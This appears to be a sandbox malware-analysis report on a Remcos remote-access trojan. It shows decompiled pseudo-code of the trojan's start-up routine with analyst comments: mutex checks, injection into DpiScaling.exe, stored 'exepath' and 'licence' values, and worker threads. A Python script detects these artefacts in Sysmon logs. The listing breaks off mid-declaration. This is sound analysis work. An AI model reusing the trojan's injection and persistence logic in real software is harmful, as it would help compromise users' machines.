                    • Opcode ID: be6cad12c344e77614ab7161f93b502ddfc4643f3128554765fcc8d2a5d5d92a
                    • Instruction ID: 97ef4402937901d3963fe518a4296ad78cd3b90a883e9fb2300271c61e114a9f
                    • Opcode Fuzzy Hash: be6cad12c344e77614ab7161f93b502ddfc4643f3128554765fcc8d2a5d5d92a
                    • Instruction Fuzzy Hash: 38014F7190011CABCB00EB90DC45EDDB7BCEF44305F10016AF905B2196EEB46A898B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: recv
                    • String ID:
                    • API String ID: 1507349165-0
                    • Opcode ID: 770d8840f0cfa992c73ee2df09c2a5214786fe1339814540061c585bff84fad7
                    • Instruction ID: e48ef5bedcc115dfdcbe715373a672fa69d6f329cf61ba9e4e3f48fb4f6a798c
                    • Opcode Fuzzy Hash: 770d8840f0cfa992c73ee2df09c2a5214786fe1339814540061c585bff84fad7
                    • Instruction Fuzzy Hash: 9DC02B3900420CBFCF011FA0CD0CCBD3FADD7443517008024F90102251C533C62097A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetUnhandledExceptionFilter.KERNELBASE(Function_0002F8C5,0042F5A8), ref: 0042F8BE
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: e558ee6a599fcacb4150c7bdc9a2a2691efb109ccac4c0442e4bfa04ac03d4bd
                    • Instruction ID: 86e206407557d0ac1bda88e2f45e42cbf33a4e9732861bd4a6740e282559d687
                    • Opcode Fuzzy Hash: e558ee6a599fcacb4150c7bdc9a2a2691efb109ccac4c0442e4bfa04ac03d4bd
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E0040C2BE(void* __edx, void* __eflags, intOrPtr _a4, char* _a12) {
                    				char _v524;
                    				char _v700;
                    				char _v720;
                    				char _v724;
                    				char _v728;
                    				char _v744;
                    				char _v756;
                    				char _v760;
                    				char _v772;
                    				struct _SECURITY_ATTRIBUTES* _v776;
                    				signed int _v780;
                    				char _v784;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t71;
                    				void* _t78;
                    				void** _t86;
                    				void* _t90;
                    				CHAR* _t93;
                    				long _t95;
                    				int _t97;
                    				char _t100;
                    				void* _t101;
                    				void* _t105;
                    				void* _t121;
                    				void* _t122;
                    				void* _t129;
                    				char _t135;
                    				char* _t137;
                    				signed char* _t139;
                    				signed char* _t141;
                    				void* _t144;
                    				void* _t146;
                    				void* _t160;
                    				void* _t163;
                    				intOrPtr _t165;
                    				void* _t166;
                    				intOrPtr _t182;
                    				intOrPtr* _t185;
                    				void* _t187;
                    				void* _t193;
                    				char* _t196;
                    				void* _t199;
                    				char* _t203;
                    				void* _t210;
                    				signed short* _t214;
                    				void* _t215;
                    				void* _t216;
                    				signed int _t217;
                    				CHAR* _t224;
                    				void* _t226;
                    				char* _t229;
                    				char* _t231;
                    				intOrPtr* _t233;
                    				void* _t235;
                    				intOrPtr* _t240;
                    				intOrPtr* _t244;
                    				void* _t246;
                    				void* _t254;
                    				void* _t265;
                    				void* _t268;
                    				struct _SECURITY_ATTRIBUTES* _t269;
                    				int _t272;
                    				char* _t360;
                    				signed int _t382;
                    				signed int _t386;
                    				int _t388;
                    				signed int _t394;
                    				signed int _t397;
                    				intOrPtr _t423;
                    				void* _t433;
                    				void* _t435;
                    				signed int _t452;
                    				void* _t455;
                    				char* _t461;
                    				void* _t462;
                    				char* _t465;
                    				void* _t467;
                    				void* _t472;
                    				char* _t477;
                    				intOrPtr* _t481;
                    				void* _t484;
                    				void* _t485;
                    				void* _t486;
                    				signed int _t492;
                    				void* _t495;
                    				void* _t496;
                    				void* _t497;
                    				void* _t499;
                    				void* _t501;
                    				void* _t502;
                    				void* _t506;
                    
                    				_t444 = __edx;
                    				 *0x46bd28 = _a4;
                    				_push(_t268);
                    				E0040CC55( &_v724, __edx, __eflags);
                    				_t495 = (_t492 & 0xfffffff8) - 0x2f4;
                    				E004020EC(_t268, _t495, __edx, __eflags, 0x46c59c);
                    				_t496 = _t495 - 0x18;
                    				E004020EC(_t268, _t496, __edx, __eflags,  &_v728); // executed
                    				_t71 = E00417478( &_v756, __edx);
                    				_t497 = _t496 + 0x30;
                    				E0040D458(__edx, _t71);
                    				E00401E74( &_v760, __edx);
                    				_t284 = _a12;
                    				if( *_a12 != 0x2d) {
                    					L6:
                    					_t461 = 0x46c578;
                    					__eflags =  *((char*)(E00401F95(E00401E49(0x46c578, _t444, __eflags, 3))));
                    					 *0x46bb01 = __eflags != 0;
                    					_t78 = E00405343(_t268,  &_v756, E004075E6( &_v780, "Software\\", __eflags, E00401E49(0x46c578, _t444, __eflags, 0xe)), 0x46c578, __eflags, "\\");
                    					_t471 = 0x46c518;
                    					E00401FD1(0x46c518, _t77, 0x46c518, _t78);
                    					E00401FC7();
                    					E00401FC7();
                    					E00405A0B(_t268, 0x46c5cc, "Exe");
                    					_t269 = 0;
                    					E00401E49(0x46c578, _t77, __eflags, 0x32);
                    					__eflags =  *(E00405220(0));
                    					 *0x46bd4e = __eflags != 0;
                    					E00401E49(0x46c578, _t77, __eflags, 0x33);
                    					_t86 = E00405220(0);
                    					__eflags =  *_t86;
                    					 *0x46bd4f =  *_t86 != 0;
                    					__eflags =  *0x46bd4e - _t269; // 0x0
                    					if(__eflags == 0) {
                    						L8:
                    						_v776 = _t269;
                    						_t472 = OpenMutexA(0x100000, _t269, "Remcos_Mutex_Inj");
                    						__eflags = _t472;
                    						if(_t472 != 0) {
                    							WaitForSingleObject(_t472, 0xea60);
                    							CloseHandle(_t472);
                    						}
                    						_t447 = E00401F95(0x46c518); // executed
                    						_t90 = E00410885(_t89, "Inj",  &_v776); // executed
                    						__eflags = _t90;
                    						if(__eflags != 0) {
                    							_t447 = E00401F95(0x46c518);
                    							E00410CE2(_t259, __eflags, "Inj");
                    						}
                    						E00401FAD(0x46c548, E00401E49(_t461, _t447, __eflags, 0xe));
                    						_t93 = E00401F95(0x46c548);
                    						_t462 = 0;
                    						_t272 = 1;
                    						CreateMutexA(0, 1, _t93); // executed
                    						_t95 = GetLastError();
                    						__eflags = _t95 - 0xb7;
                    						if(_t95 == 0xb7) {
                    							L45:
                    							E00401FC7();
                    							_t97 = _t272;
                    							goto L5;
                    						} else {
                    							E0040CD09();
                    							GetModuleFileNameW(0, "C:\Windows\SysWOW64\DpiScaling.exe", 0x104);
                    							_t100 = E00417614(0x46c548);
                    							_push(0x46c548);
                    							_t448 = 0x80000002;
                    							 *0x46beb4 = _t100;
                    							_t101 = E004108E2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
                    							_t499 = _t497 + 0xc;
                    							E00401FD1(0x46c5b4, 0x80000002, 0x46c5b4, _t101);
                    							E00401FC7();
                    							__eflags =  *0x46beb4;
                    							if( *0x46beb4 == 0) {
                    								_push(" (32 bit)");
                    							} else {
                    								_push(" (64 bit)");
                    							}
                    							E00405A02(_t272, 0x46c5b4, _t462);
                    							_t105 =  *0x46bd20;
                    							__eflags = _t105;
                    							if(_t105 != 0) {
                    								 *0x46a9d0 =  *_t105();
                    							}
                    							_t477 = 0x46c578;
                    							__eflags = _v776 - _t462;
                    							if(__eflags == 0) {
                    								_t433 = E00401E49(0x46c578, _t448, __eflags, 0x2e);
                    								__eflags =  *((char*)(E00401F95(_t433)));
                    								if(__eflags != 0) {
                    									__eflags =  *0x46bd20 - _t462; // 0x7536e630
                    									if(__eflags != 0) {
                    										__eflags =  *0x46a9d0 - _t462; // 0x1
                    										if(__eflags == 0) {
                    											_t448 = E00401F95(0x46c518);
                    											_t254 = E0041083B(0x46c518, _t253, "origmsc");
                    											_pop(_t435);
                    											__eflags = _t254;
                    											if(__eflags == 0) {
                    												E00405F77(_t272, _t435, _t448);
                    											}
                    										} else {
                    											_push(_t433);
                    											_push(_t433);
                    											__eflags = E0040A713() - 0xffffffff;
                    											if(__eflags == 0) {
                    												E00406071(__eflags);
                    											}
                    										}
                    									}
                    								}
                    							}
                    							__eflags =  *((char*)(E00401F95(E00401E49(_t477, _t448, __eflags, 0x27))));
                    							if(__eflags != 0) {
                    								E0040D3F7();
                    							}
                    							E00409DC9(_t272, 0x46c4e8, E00401F95(E00401E49(_t477, _t448, __eflags, 0xb)));
                    							__eflags =  *((char*)(E00401F95(E00401E49(_t477, _t448, __eflags, 4))));
                    							 *0x46bb02 = __eflags != 0;
                    							__eflags =  *((char*)(E00401F95(E00401E49(_t477, _t448, __eflags, 5))));
                    							 *0x46bafb = __eflags != 0;
                    							__eflags =  *((char*)(E00401F95(E00401E49(_t477, _t448, __eflags, 8))));
                    							 *0x46bb00 = __eflags != 0;
                    							__eflags =  *((char*)(E00401F95(E00401E49(_t477, _t448, __eflags, 3))));
                    							if(__eflags != 0) {
                    								_t240 = E00401F95(E00401E49(_t477, _t448, __eflags, 0x30));
                    								_t25 = _t240 + 2; // 0x2
                    								_t448 = _t25;
                    								do {
                    									_t423 =  *_t240;
                    									_t240 = _t240 + 2;
                    									__eflags = _t423 - _t462;
                    								} while (_t423 != _t462);
                    								__eflags = _t240 - _t448;
                    								if(__eflags != 0) {
                    									_t244 = E00401F95(E00401E49(_t477, _t448, __eflags, 9));
                    									_t246 = E00401F95(E00401E49(0x46c578, _t448, __eflags, 0x30));
                    									_t448 =  *_t244;
                    									E00401EFA(0x46c530,  *_t244, _t244, E0041805B( &_v780,  *_t244, _t246));
                    									E00401EF0();
                    									_t477 = 0x46c578;
                    								}
                    							}
                    							// Two ways of recording the executable path under the value name "exepath". The
                    							// storage helpers (E00410A30 / E00410C80) take the key at 0x46c518; that they write
                    							// the registry is inferred from the "Software\" string below, not from this
                    							// function's own API list.
                    							__eflags = _v776 - _t462;
                    							if(_v776 != _t462) {
                    								// _v524 is a 0x208-byte buffer, i.e. MAX_PATH (0x104) wide characters.
                    								E00431F00(_t462,  &_v524, _t462, 0x208);
                    								_t121 = E00402489();
                    								_t122 = E00401F95(0x46c560);
                    								_t449 = E00401F95(0x46c518);
                    								E00410A30(_t124, "exepath",  &_v524, 0x208, _t122, _t121);
                    								_t501 = _t499 + 0x20;
                    								E00409DC9(_t272, 0x46c500,  &_v524);
                    								_t465 = 0x46c578;
                    								goto L47;
                    							} else {
                    								__eflags =  *0x46bb01;
                    								if(__eflags == 0) {
                    									// The literal here is what the buffer held at dump time; it matches the path
                    									// GetModuleFileNameW returned for this process (see APIs below), consistent
                    									// with the dump having been taken from the DpiScaling.exe injection host.
                    									E00409DC9(_t272, 0x46c500, "C:\Windows\SysWOW64\DpiScaling.exe");
                    								} else {
                    									_t229 = E00401F95(E00401E49(_t477, _t448, __eflags, 0x1e));
                    									_t231 = E00401F95(E00401E49(_t477, _t448, __eflags, 0xc));
                    									_t233 = E00401F95(E00401E49(0x46c578, _t448, __eflags, 9));
                    									__eflags =  *_t229;
                    									__eflags =  *_t231;
                    									_t477 = 0x46c578;
                    									_t235 = E00401F95(E00401E49(0x46c578, _t448,  *_t231, 0xa));
                    									E0040A987( *_t233, E00401F95(E00401E49(0x46c578, _t448, __eflags, 0x30)), _t235, ((_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0x000000ff);
                    									_t499 = _t499 + 0xc;
                    									_t272 = 1;
                    									_t462 = 0;
                    								}
                    								_t210 = E00402489();
                    								_t452 = 2;
                    								_t394 =  ~(0 | __eflags > 0x00000000) | (_t210 + 0x00000001) * _t452;
                    								_push(_t394);
                    								_v780 = _t394;
                    								_t486 = E0042F4C6(_t394, (_t210 + 1) * _t452 >> 0x20, _t477, __eflags);
                    								__eflags = _t486;
                    								if(_t486 == 0) {
                    									_t486 = _t462;
                    								} else {
                    									E00431F00(_t462, _t486, _t462, _v780);
                    									_t499 = _t499 + 0xc;
                    								}
                    								_t214 = E00401EEB(0x46c500);
                    								_t455 = _t486 - _t214;
                    								__eflags = _t455;
                    								_t467 = 2;
                    								do {
                    									_t397 =  *_t214 & 0x0000ffff;
                    									 *(_t214 + _t455) = _t397;
                    									_t214 = _t214 + _t467;
                    									__eflags = _t397;
                    								} while (_t397 != 0);
                    								_push(_t397);
                    								_t215 = E00402489();
                    								_t216 = E00401F95(0x46c560);
                    								_t217 = E00402489();
                    								E00410C80(E00401F95(0x46c518), __eflags, "exepath", _t486, 2 + _t217 * 2, _t216, _t215); // executed
                    								E0042F4CF(_t486);
                    								_t501 = _t499 + 0x1c;
                    								_t465 = 0x46c578;
                    								E00401E49(0x46c578, _t219, __eflags, 0xd);
                    								_t449 = "0";
                    								__eflags = E0040EAD9(__eflags);
                    								if(__eflags == 0) {
                    									L47:
                    									_push(_t272);
                    									_t129 = E00401F95(E00401E49(_t465, _t449, __eflags, 0x34));
                    									_t502 = _t501 - 0x18;
                    									E00402084(_t272, _t502, _t129);
                    									// Config field 0x34 is stored under the value name "licence" (same helper family as "exepath").
                    									_push("licence");
                    									_t450 = E00401F95(0x46c518); // executed
                    									E00410AA7(0x46c518, _t131); // executed
                    									_t497 = _t502 + 0x20;
                    									// Field 0x28 parsed as an integer (E00436769 is the same parser that feeds Sleep in
                    									// E00411929 below): 2 -> E00418F59(1, ...), 1 -> E00418F59(0, ...), both followed by
                    									// a thread at E00418D28; any other value starts nothing.
                    									_t135 = E00436769(_t133, E00401F95(E00401E49(_t465, _t131, __eflags, 0x28)));
                    									 *0x46bb03 = _t135;
                    									__eflags = _t135 - 2;
                    									if(_t135 != 2) {
                    										__eflags = _t135 - _t272;
                    										if(__eflags == 0) {
                    											_t388 = 0;
                    											__eflags = 0;
                    											goto L51;
                    										}
                    									} else {
                    										_t388 = _t272;
                    										L51:
                    										E00418F59(_t272, _t388, _t450);
                    										__eflags = 0;
                    										CreateThread(0, 0, E00418D28, 0, 0, 0);
                    									}
                    									_t137 = E00401F95(E00401E49(_t465, _t450, __eflags, 0x37));
                    									_t139 = E00401F95(E00401E49(_t465, _t450, __eflags, 0x10));
                    									_t141 = E00401F95(E00401E49(_t465, _t450, __eflags, 0xf));
                    									__eflags =  *_t137;
                    									_t471 = 0x46c578;
                    									_t144 = E00436769(_t142, E00401F95(E00401E49(0x46c578, _t450,  *_t137, 0x36)));
                    									_t146 = E00401F95(E00401E49(0x46c578, _t450, __eflags, 0x11));
                    									E0040846D(_t139,  *_t141 & 0x000000ff,  *_t139 & 0x000000ff, E00401F95(E00401E49(0x46c578, _t450, __eflags, 0x31)), _t146, _t144, (_t140 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
                    									// Fields 0x14 and 0x16: each equal to 1 starts a thread at E00415938 with a 2-byte heap
                    									// argument; byte 0 is 0 for field 0x14 and 1 for field 0x16, byte 1 is set when field
                    									// 0x35 is non-empty.
                    									__eflags =  *((intOrPtr*)(E00401F95(E00401E49(0x46c578, _t450, __eflags, 0x14)))) - 1;
                    									if(__eflags != 0) {
                    										_t461 = CreateThread;
                    									} else {
                    										_t199 = 2;
                    										_t485 = E0042F218(_t450, 0x46c578, __eflags, _t199);
                    										 *_t485 = 0;
                    										_t386 = E00401E49(0x46c578, _t450, __eflags, 0x35);
                    										_t203 = E00401F95(_t386);
                    										_t461 = CreateThread;
                    										__eflags =  *_t203;
                    										 *((char*)(_t485 + 1)) = _t386 & 0xffffff00 | __eflags != 0x00000000;
                    										CreateThread(0, 0, E00415938, _t485, 0, 0);
                    										_t471 = 0x46c578;
                    									}
                    									__eflags =  *((intOrPtr*)(E00401F95(E00401E49(_t471, _t450, __eflags, 0x16)))) - 1;
                    									if(__eflags == 0) {
                    										_t193 = 2;
                    										_t484 = E0042F218(_t450, _t471, __eflags, _t193);
                    										 *_t484 = 1;
                    										_t382 = E00401E49(0x46c578, _t450, __eflags, 0x35);
                    										_t196 = E00401F95(_t382);
                    										__eflags =  *_t196;
                    										__eflags = 0;
                    										 *((char*)(_t484 + 1)) = _t382 & 0xffffff00 |  *_t196 != 0x00000000;
                    										CreateThread(0, 0, E00415938, _t484, 0, 0);
                    										_t471 = 0x46c578;
                    									}
                    									// Field 0x23 == 1: set the flag byte 0x46ba75, derive a value from fields 0x25/0x26
                    									// with E0041800F into 0x46c0e0 (same pattern as fields 9/0x30 above), start E00401BCD.
                    									__eflags =  *((intOrPtr*)(E00401F95(E00401E49(_t471, _t450, __eflags, 0x23)))) - 1;
                    									if(__eflags == 0) {
                    										 *0x46ba75 = 1;
                    										_t185 = E00401F95(E00401E49(_t471, _t450, __eflags, 0x25));
                    										_t187 = E00401F95(E00401E49(0x46c578, _t450, __eflags, 0x26));
                    										_t450 =  *_t185;
                    										E00401EFA(0x46c0e0,  *_t185, _t185, E0041800F( &_v780,  *_t185, _t187));
                    										E00401EF0();
                    										__eflags = 0;
                    										CreateThread(0, 0, E00401BCD, 0, 0, 0);
                    										_t471 = 0x46c578;
                    									}
                    									// Field 0x2b == 1: E0040A679 receives field 0x2d parsed as an integer; field 0x2c is
                    									// only tested for being non-empty.
                    									__eflags =  *((intOrPtr*)(E00401F95(E00401E49(_t471, _t450, __eflags, 0x2b)))) - 1;
                    									if(__eflags == 0) {
                    										_t471 = E00401F95(E00401E49(_t471, _t450, __eflags, 0x2c));
                    										_t182 = E00436769(_t180, E00401F95(E00401E49(0x46c578, _t450, __eflags, 0x2d)));
                    										__eflags =  *_t471;
                    										_t450 = _t182;
                    										__eflags =  *_t471 != 0;
                    										E0040A679(_t182);
                    									}
                    									_t160 = E00416D9E( &_v772, _t461, __eflags); // executed
                    									E00401EFA(0x46c584, _t450, _t471, _t160);
                    									_t360 =  &_v776;
                    									E00401EF0();
                    									// Optional callback pointer at 0x46bd14 is invoked with 0 before the workers start.
                    									_t163 =  *0x46bd14;
                    									_t269 = 0;
                    									__eflags = _t163;
                    									if(_t163 != 0) {
                    										 *_t163(0); // executed
                    									}
                    									// Unconditional worker thread E0040D0B5; E0040FAC7 and E0040FFE5 are gated by the
                    									// flag bytes 0x46bd4e and 0x46bd4f.
                    									CreateThread(_t269, _t269, E0040D0B5, _t269, _t269, _t269); // executed
                    									__eflags =  *0x46bd4e;
                    									if( *0x46bd4e != 0) {
                    										CreateThread(_t269, _t269, E0040FAC7, _t269, _t269, _t269);
                    									}
                    									__eflags =  *0x46bd4f;
                    									if( *0x46bd4f != 0) {
                    										CreateThread(_t269, _t269, E0040FFE5, _t269, _t269, _t269);
                    									}
                    									// 0x46a9d0 (1 in this dump) selects the "Access level: " text logged at L71/L72:
                    									// 0 -> "User", 1 -> "Administrator", anything else skips the message (L73).
                    									_t165 =  *0x46a9d0; // 0x1
                    									_t166 = _t165 - _t269;
                    									__eflags = _t166;
                    									if(__eflags == 0) {
                    										goto L71;
                    									} else {
                    										__eflags = _t166 - 1;
                    										if(__eflags == 0) {
                    											_push("Administrator");
                    											goto L72;
                    										}
                    									}
                    									goto L73;
                    								} else {
                    									_t224 = E00401E49(0x46c578, "0", __eflags, 0xd);
                    									_t506 = _t501 - 0x18;
                    									_t449 = _t224;
                    									E004172DA(_t506, _t224);
                    									_t226 = E0040CE44(__eflags);
                    									_t501 = _t506 + 0x18;
                    									__eflags = _t226 - _t272;
                    									if(__eflags != 0) {
                    										goto L47;
                    									} else {
                    										_t272 = 3;
                    										goto L45;
                    									}
                    								}
                    							}
                    						}
                    					} else {
                    						// Look up the value named "WD" into _v780; when present, E00410CE2 is applied to the same
                    						// key with "WD" (presumably clearing it) and E0040FD95 runs before start-up continues at L71.
                    						_v780 = 0;
                    						_t265 = E00410885(E00401F95(0x46c518), "WD",  &_v780);
                    						__eflags = _t265;
                    						if(_t265 != 0) {
                    							E00410CE2(E00401F95(0x46c518), __eflags, "WD");
                    							E0040FD95();
                    							L71:
                    							_push("User");
                    							L72:
                    							// Emits the log line "[Info] Access level: <User|Administrator>" through E004075C2 / E00416C80.
                    							E004075C2(_t269, _t497 - 0x18, "Access level: ", _t461, __eflags, E00402084(_t269,  &_v776));
                    							E00402084(_t269, _t497 - 4, "[Info]");
                    							E00416C80(_t269, _t461);
                    							_t360 =  &_v784;
                    							E00401FC7(); // executed
                    							L73:
                    							E00411929(); // executed
                    							// E00411929 (decompiled below) does not return. The int3 padding and the lines after it,
                    							// down to the final return, are the decompiler running into the next function (the
                    							// address column confirms the jump to 0x0040e032); they are not part of this routine.
                    							asm("int3");
                    							_push(_t471);
                    							_t481 = _t360 + 0x68;
                    							E0040D515(_t269, _t481, _t481);
                    							_t284 = _t481;
                    							 *_t284 = 0x460788;
                    							 *_t284 = 0x460744;
                    							return E004304F6(_t284);
                    						} else {
                    							goto L8;
                    						}
                    					}
                    				} else {
                    					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
                    					if(__eflags != 0) {
                    						goto L6;
                    					} else {
                    						__eax =  *(__ecx + 2) & 0x000000ff;
                    						__eflags = __al;
                    						if(__eflags != 0) {
                    							goto L6;
                    						} else {
                    							// Command-line switch whose second character is 'l' and which is two characters long
                    							// (the first character is tested before this excerpt): open "license_code.txt" (mode 2),
                    							// write config field 0x34 (the "licence" value above) into it and return 1 without
                    							// continuing normal start-up.
                    							_push(__ecx);
                    							_push(__ecx);
                    							__ecx =  &_v700;
                    							__eax = E0040D544( &_v700, __edx, __eflags, "license_code.txt", 2);
                    							__ecx = 0x46c578;
                    							__ecx = E00401E49(0x46c578, __edx, __eflags, 0x34);
                    							__edx = __eax;
                    							__ecx =  &_v720;
                    							__eax = E0040E8BB( &_v720, __edx, __eflags);
                    							__ecx =  &_v720;
                    							__eax = E0040D4F5( &_v720, __edx, __eflags);
                    							__ecx =  &_v720;
                    							L74();
                    							__ecx =  &_v744;
                    							E00401FC7() = 0;
                    							__eax = 1;
                    							__eflags = 1;
                    							L5:
                    							return _t97;
                    						}
                    					}
                    				}
                    			}
                    Instruction addresses for the decompiled lines above (the per-line address column could not be realigned after extraction): the listing spans 0x0040c177 through 0x0040cc4d, plus one entry at 0x0040e032.

                    APIs
                    • OpenMutexA.KERNEL32 ref: 0040C471
                    • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C483
                    • CloseHandle.KERNEL32(00000000), ref: 0040C48A
                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0040C4E9
                    • GetLastError.KERNEL32 ref: 0040C4EF
                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\DpiScaling.exe,00000104), ref: 0040C510
                      • Part of subcall function 0040E8BB: __EH_prolog.LIBCMT ref: 0040E8C0
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
                    • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Windows\SysWOW64\DpiScaling.exe$Exe$Exe$Inj$ProductName$Remcos$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Sept-AITAB5$Software\$User$[Info]$exepath$licence$license_code.txt$origmsc
                    • API String ID: 1247502528-626796739
                    • Opcode ID: 4b207ed638967b4401ac86fe367ff117de20b2f704d0ea2f0959e07d27e19a7d
                    • Instruction ID: 97ecaa49e5e083256040f844ff0fd3ae96e39466cf8f0e182fdc5e320802d438
                    • Opcode Fuzzy Hash: 4b207ed638967b4401ac86fe367ff117de20b2f704d0ea2f0959e07d27e19a7d
                    • Instruction Fuzzy Hash: 5432F460B443516BDA1577729CA6B3F26898B8170CF04053FB542BB2E3EE7C9D4583AE
                    Uniqueness

                    Uniqueness Score: -1.00%
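
As an added triage example (not part of the Joe Sandbox report and not the sample's own code), the following Python scans Sysmon-style JSON events for the host artefacts this start-up routine leaves behind: the "exepath" and "licence" values and a remote thread created in the DpiScaling.exe process that GetModuleFileNameW identified as the host. Assumptions: Sysmon's field names (EventID, TargetObject, Image, SourceImage, TargetImage), that the two values land in the registry under a per-user Software\ subkey (the report lists "Software\" among this function's strings but the registry APIs sit in subcalls), and that the subkey is named "Sept-AITAB5"; the log lines are constructed.

```python
"""Triage of Sysmon-style events for the Remcos start-up artefacts seen above."""
import json
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Value names this function stores (visible in the decompiled code above).
REMCOS_VALUE_NAMES = {"exepath", "licence"}
# Image GetModuleFileNameW returned for the dumped process (APIs above).
INJECTION_HOST_IMAGE = r"C:\Windows\SysWOW64\DpiScaling.exe"


@dataclass(frozen=True)
class Finding:
    rule: str
    event_id: int
    source_image: str
    detail: str


def check_registry_value(ev: dict) -> Optional[Finding]:
    """Sysmon Event 13 (value set): flag 'exepath'/'licence' written under a Software\\ key."""
    if ev.get("EventID") != 13:
        return None
    target = ev.get("TargetObject", "")
    key, _, value_name = target.rpartition("\\")
    if value_name.lower() not in REMCOS_VALUE_NAMES:
        return None
    if "\\software\\" not in key.lower():
        return None
    return Finding("remcos_config_value_set", 13, ev.get("Image", ""), target)


def check_remote_thread(ev: dict) -> Optional[Finding]:
    """Sysmon Event 8 (CreateRemoteThread): flag a thread injected into the DpiScaling.exe host."""
    if ev.get("EventID") != 8:
        return None
    target = ev.get("TargetImage", "")
    if target.lower() != INJECTION_HOST_IMAGE.lower():
        return None
    return Finding("remote_thread_into_dpiscaling", 8, ev.get("SourceImage", ""), target)


CHECKS = (check_registry_value, check_remote_thread)


def scan(lines: Iterable[str]) -> List[Finding]:
    """Run every check over each JSON event line; blank or malformed lines are skipped."""
    findings: List[Finding] = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            ev = json.loads(raw)
        except json.JSONDecodeError:
            continue
        for check in CHECKS:
            hit = check(ev)
            if hit is not None:
                findings.append(hit)
    return findings


def summarize(findings: Iterable[Finding]) -> dict:
    """Count findings per rule name."""
    counts: dict = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


# Constructed sample log (not taken from the report). The subkey "Sept-AITAB5" is an
# assumption: the string is in this function's string list, but the report does not
# show which key the values are written under.
_USER_HIVE = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": INJECTION_HOST_IMAGE,
     "TargetObject": _USER_HIVE + r"\Software\Sept-AITAB5\exepath",
     "Details": r"C:\Users\user\Desktop\IQl00lxPjo.exe"},
    {"EventID": 13, "Image": INJECTION_HOST_IMAGE,
     "TargetObject": _USER_HIVE + r"\Software\Sept-AITAB5\licence",
     "Details": "(placeholder)"},
    {"EventID": 8, "SourceImage": r"C:\Users\user\Desktop\IQl00lxPjo.exe",
     "TargetImage": INJECTION_HOST_IMAGE},
    # Benign noise that must not match:
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": _USER_HIVE + r"\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe"},
    {"EventID": 1, "Image": INJECTION_HOST_IMAGE, "CommandLine": "DpiScaling.exe"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f.rule:32} evt={f.event_id} src={f.source_image} {f.detail}")
```

The value-name rule deliberately ignores the subkey name, since that part of the path comes from the sample's configuration and changes between builds; the two value names and the injection host are the stable pieces this function exposes.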

                    C-Code - Quality: 85%
                    			E00411929() {
                    				struct _SECURITY_ATTRIBUTES* _v8;
                    				char _v20;
                    				char _v32;
                    				char _v56;
                    				char _v80;
                    				char _v104;
                    				char _v128;
                    				char _v140;
                    				void* _v163;
                    				char _v164;
                    				char _v188;
                    				char _v212;
                    				char _v236;
                    				char _v260;
                    				char _v284;
                    				char _v308;
                    				char _v332;
                    				char _v356;
                    				char _v380;
                    				char _v404;
                    				char _v428;
                    				char _v452;
                    				char _v476;
                    				char _v500;
                    				char _v524;
                    				char _v548;
                    				char _v572;
                    				char _v596;
                    				char _v620;
                    				char _v644;
                    				char _v668;
                    				char _v692;
                    				char _v716;
                    				char _v740;
                    				char _v764;
                    				char _v788;
                    				char _v812;
                    				char _v836;
                    				char _v860;
                    				char _v884;
                    				char _v908;
                    				char _v932;
                    				char _v956;
                    				char _v980;
                    				char _v1004;
                    				char _v1028;
                    				char _v1052;
                    				char _v1076;
                    				char _v1100;
                    				char _v1124;
                    				char _v1148;
                    				char _v1172;
                    				char _v1196;
                    				char _v1220;
                    				char _v1244;
                    				char _v1268;
                    				char _v1292;
                    				char _v1316;
                    				char _v1340;
                    				char _v1364;
                    				char _v1388;
                    				char _v1412;
                    				char _v1436;
                    				char _v2436;
                    				signed int _t166;
                    				void* _t168;
                    				long _t172;
                    				void* _t174;
                    				signed char _t178;
                    				void* _t184;
                    				short _t195;
                    				void* _t197;
                    				void* _t198;
                    				void* _t200;
                    				long _t204;
                    				short _t209;
                    				void* _t210;
                    				void* _t212;
                    				void* _t225;
                    				void* _t233;
                    				void* _t234;
